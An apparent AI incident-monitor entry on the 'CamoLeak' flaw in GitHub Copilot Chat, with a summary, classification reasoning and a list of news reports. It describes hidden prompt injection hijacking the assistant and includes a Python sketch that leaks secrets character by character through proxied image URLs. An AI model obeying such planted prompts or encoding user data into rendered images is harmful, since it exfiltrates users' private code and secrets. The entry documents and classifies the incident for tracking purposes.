GitHub Copilot Chat Vulnerability Exposes Private Code and Secrets


The information displayed in the AIM should not be reported as representing the official views of the OECD or of its member countries.

A critical vulnerability in GitHub Copilot Chat allowed attackers to exfiltrate private source code and secrets by combining prompt injection with abuse of image proxying. Hidden prompts could hijack the AI assistant's responses and leak sensitive data. GitHub patched the issue by disabling image rendering in Copilot Chat.[AI generated]
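The exfiltration channel described above can be illustrated with a short conceptual sketch. It assumes, hypothetically, that an attacker pre-generates one proxied image URL per character; a hidden prompt that makes the assistant render those images in sequence then turns ordinary image loads into a character-by-character data channel. All names and URLs below are illustrative placeholders, not GitHub's actual proxy endpoints.

```python
# Conceptual sketch of an image-based exfiltration channel, assuming the
# attacker has pre-generated one proxied image URL per character.
# The domain and paths here are hypothetical placeholders.

def encode_as_image_urls(secret: str, url_for_char: dict[str, str]) -> list[str]:
    """Map each character of the secret to its pre-registered image URL.

    If a chat client renders these images in order, the sequence of
    requests reaching the attacker's server spells out the secret.
    """
    return [url_for_char[c] for c in secret if c in url_for_char]

# Hypothetical per-character lookup table the attacker would prepare in advance.
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_-"
url_for_char = {c: f"https://proxy.example/img/{ord(c):02x}.png" for c in alphabet}

urls = encode_as_image_urls("api_key", url_for_char)
```

Disabling image rendering in the chat client, as GitHub did, closes this channel entirely: the crafted URLs are never fetched, so no requests reach the attacker.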

Why's our monitor labelling this an incident or hazard?

The event involves an AI system (GitHub Copilot Chat) whose malfunction, a security vulnerability, directly created a significant risk of harm: the unauthorized disclosure of sensitive information, which constitutes harm to property and potentially to communities that rely on secure software development. The vulnerability was actively exploitable, and proof-of-concept attacks demonstrated actual data exfiltration. This therefore qualifies as an AI Incident: the AI system's malfunction directly led to realized or imminent harm through data leakage.[AI generated]
AI principles
Accountability, Privacy & data governance, Robustness & digital security, Safety

Industries
IT infrastructure and hosting, Digital security

Affected stakeholders
Consumers, Business

Harm types
Economic/Property, Reputational

Severity
AI incident

Business function
Research and development

AI system task
Interaction support/chatbots, Content generation


Articles about this incident or hazard


GitHub patches Copilot Chat flaw that could leak secrets

2025-10-09
TheRegister.com
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (GitHub Copilot Chat) whose malfunction, a security vulnerability, directly created a significant risk of harm: the unauthorized disclosure of sensitive information, which constitutes harm to property and potentially to communities that rely on secure software development. The vulnerability was actively exploitable, and proof-of-concept attacks demonstrated actual data exfiltration. This therefore qualifies as an AI Incident: the AI system's malfunction directly led to realized or imminent harm through data leakage.

GitHub Copilot 'CamoLeak' AI Attack Exfiltrates Data

2025-10-09
Dark Reading
Why's our monitor labelling this an incident or hazard?
The event explicitly involves an AI system, GitHub Copilot, whose manipulation directly enabled the exfiltration of sensitive user data, constituting harm to property and a violation of user rights. The exploit demonstrates misuse of the AI system's outputs leading to realized harm. GitHub's mitigation efforts indicate the seriousness of the incident. This therefore qualifies as an AI Incident: the AI system's use directly created a security breach risk and potential harm to users.

CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code

2025-10-08
Security Boulevard
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (GitHub Copilot Chat) whose malfunction (security vulnerability) directly led to harm by leaking private source code and secrets, which constitutes harm to property and violation of intellectual property rights. The attack exploited the AI system's context-aware capabilities and permissions, resulting in unauthorized data exfiltration. Therefore, this qualifies as an AI Incident due to realized harm caused by the AI system's malfunction.

GitHub Copilot Chat Flaw Let Private Code Leak Via Images

2025-10-09
DataBreachToday
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (GitHub Copilot Chat) whose malfunction, a security flaw, directly led to the unauthorized leakage of private source code and secrets, which is harm to property and a violation of intellectual property rights. The exploit used prompt injection and the assistant's context awareness to exfiltrate data, fulfilling the criteria for an AI Incident. The harm is realized, not merely potential, and the AI system's role was pivotal in enabling the data theft.

Critical GitHub Copilot Vulnerability Let Attackers Exfiltrate Source Code From Private Repos

2025-10-10
Cyber Security News
Why's our monitor labelling this an incident or hazard?
GitHub Copilot Chat is an AI system that uses repository context to generate code suggestions. The described vulnerability exploited the AI's prompt processing and bypassed security controls to leak sensitive data from private repositories. This directly led to unauthorized exfiltration of source code and secrets, which is a clear harm to property and intellectual property rights. The event involves the use and malfunction of an AI system leading to realized harm, fitting the definition of an AI Incident.